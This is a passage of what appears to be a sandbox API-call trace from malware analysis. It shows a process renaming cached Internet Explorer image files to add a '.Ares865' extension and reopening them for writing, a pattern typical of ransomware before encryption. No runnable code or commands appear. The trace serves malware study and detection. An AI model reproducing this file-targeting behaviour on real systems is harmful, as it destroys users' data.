files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8883) returned 1 [0095.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg.Ares865") returned 117 [0095.376] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.378] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6607) returned 1 [0095.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg.Ares865") returned 117 [0095.381] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11425) returned 1 [0095.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg.Ares865") returned 117 [0095.386] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7991) returned 1 [0095.390] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg.Ares865") returned 117 [0095.390] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8497) returned 1 [0095.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg.Ares865") returned 117 [0095.396] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14090) returned 1 [0095.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg.Ares865") returned 117 [0095.410] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8864) returned 1 [0095.414] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg.Ares865") returned 117 [0095.414] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8246) returned 1 [0095.421] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg.Ares865") returned 117 [0095.421] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5117) returned 1 [0095.425] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg.Ares865") returned 117 [0095.425] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.427] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2180) returned 1 [0095.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg.Ares865") returned 117 [0095.430] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13528) returned 1 [0095.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg.Ares865") returned 117 [0095.435] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg.ares865"), dwFlags=0x1) returned 1 [0095.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12241) returned 1 [0095.440] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg.Ares865") returned 117 [0095.440] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.441] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10691) returned 1 [0095.444] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg.Ares865") returned 117 [0095.444] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg.ares865"), dwFlags=0x1) returned 1 [0095.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2683) returned 1 [0095.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg.Ares865") returned 117 [0095.448] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6063) returned 1 [0095.453] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg.Ares865") returned 117 [0095.453] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2803) returned 1 [0095.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg.Ares865") returned 117 [0095.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13578) returned 1 [0095.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg.Ares865") returned 117 [0095.463] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1676) returned 1 [0095.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png.Ares865") returned 117 [0095.467] MoveFileExW 